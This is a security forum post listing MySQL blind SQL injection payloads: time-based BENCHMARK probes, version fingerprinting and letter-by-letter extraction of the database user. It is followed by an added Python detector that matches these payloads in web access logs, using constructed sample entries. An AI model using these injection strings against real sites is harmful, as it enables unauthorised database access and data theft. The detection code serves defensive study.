GreySec Forums

[SQLi] Blind SQLi queries

Credits: Rouge Coder @ Intosec

Rouge Coder Wrote: First off, as the title says, this is not a tutorial. I've been messing around keeping my skills fresh today and wrote down some blind SQLi queries that I used and thought I'd share them here.

Code:
-- Check for blind injection vulnerability
OR (IF (1=2, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) --

-- Check for subselect
OR (SELECT 1)=1 --

-- Find version
AND SUBSTRING(@@version,1,1) = 4 --

-- Find length of database user
OR (IF (LENGTH(user()) > 1, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) --

-- Brute-force database username (65 = A -> 90 = Z, 97 = a -> 122 = z)
OR (IF (ASCII(SUBSTRING(user(),1,1)) > 65, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) -- Find first letter
OR (IF (ASCII(SUBSTRING(user(),2,1)) > 65, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) -- Find second letter
OR (IF (ASCII(SUBSTRING(user(),3,1)) > 65, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) -- Find third letter

There's of course a lot more that can be done here, but this should at least give newcomers a decent idea about how blind SQL injection works.
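Added example, not part of Rouge Coder's post: a small Python detector that URL-decodes the query string of each access-log request and flags the probe shapes listed above (the BENCHMARK timing wrapper, the IF(..., null, ...) conditional, the @@version and user() inference, and the subselect check). The log lines, client IPs and signature names are constructed for this example.

```python
import re
from urllib.parse import quote, unquote_plus

# Regexes for the payload shapes in the post above, matched case-insensitively
# after URL-decoding. Signature names and thresholds are this example's own choices.
SIGNATURES = [
    ("time_based_benchmark", re.compile(r"\bBENCHMARK\s*\(\s*\d{5,}\s*,", re.I)),
    ("conditional_if_wrapper", re.compile(r"\bIF\s*\(.*?,\s*null\s*,", re.I | re.S)),
    ("version_fingerprint", re.compile(r"SUBSTRING\s*\(\s*@@version", re.I)),
    ("user_enumeration", re.compile(r"(LENGTH|SUBSTRING)\s*\(\s*user\s*\(\s*\)", re.I)),
    ("subselect_probe", re.compile(r"\bOR\s*\(\s*SELECT\s+1\s*\)\s*=\s*1", re.I)),
]
# Request target from an Apache/nginx combined-format log line.
REQUEST_RX = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def classify(query_string):
    # URL-decode at most twice (probes are often double-encoded), then run signatures.
    text = unquote_plus(query_string)
    text = unquote_plus(text) if text != query_string else text
    return [name for name, rx in SIGNATURES if rx.search(text)]

def scan_access_log(lines):
    # (client_ip, path, findings) for each request whose query string matches.
    hits = []
    for line in lines:
        m = REQUEST_RX.search(line)
        if not m or "?" not in m.group(1):
            continue
        path, _, query = m.group(1).partition("?")
        findings = classify(query)
        if findings:
            hits.append((line.split(" ", 1)[0], path, findings))
    return hits

def _entry(ip, payload):
    # Constructed combined-format log line carrying the payload in the id parameter.
    return (f'{ip} - - [10/Oct/2023:13:55:36 +0000] '
            f'"GET /item.php?id={quote(payload)} HTTP/1.1" 200 512')

# Constructed sample log: three probes from the post plus one benign request.
SAMPLE_LOG = [
    _entry("203.0.113.7", "1 OR (IF (1=2, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) --"),
    _entry("203.0.113.7", "1 AND SUBSTRING(@@version,1,1) = 4 --"),
    _entry("198.51.100.4", "42"),
    _entry("203.0.113.7", "1 OR (IF (ASCII(SUBSTRING(user(),1,1)) > 65, null, BENCHMARK(10000000, ENCODE('MSG', 'by 5 seconds')))) --"),
]
```

Calling scan_access_log(SAMPLE_LOG) returns three hits from 203.0.113.7 and nothing for the benign id=42 request; the repeated BENCHMARK hits from one client over a short window are the pattern worth alerting on.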